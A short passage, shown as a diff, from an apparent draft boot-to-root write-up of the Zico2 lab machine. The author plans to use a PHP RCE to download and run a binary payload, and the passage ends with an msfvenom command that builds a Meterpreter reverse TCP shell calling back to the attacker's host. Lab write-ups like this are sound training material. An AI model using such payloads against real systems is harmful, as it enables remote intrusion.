DanHatesNumbers/danhatesnumbers.github.io/_drafts/BootToRoot-Zico2.md

 After a while, I came to the conclusion that I could use the PHP RCE exploit to get the target to download and execute a binary payload, which I could host on my Kali VM using a simple Python HTTP server.
 Using Metasploit, I could build a binary payload to preform a reverse TCP connection to establish a remote shell.

-So first, the Metasploit payload.
+First things first, let's create the Metasploit payload.
 I generated this using msfvenom, which is the standalone tool in the Metasploit framework for payload generation.

 ~~~
 ~/b/zico2 # ❯❯❯ msfvenom -p linux/x64/meterpreter_reverse_tcp -f elf -o shell -a x64 --platform linux LHOST=192.168.56.102 LPORT=12345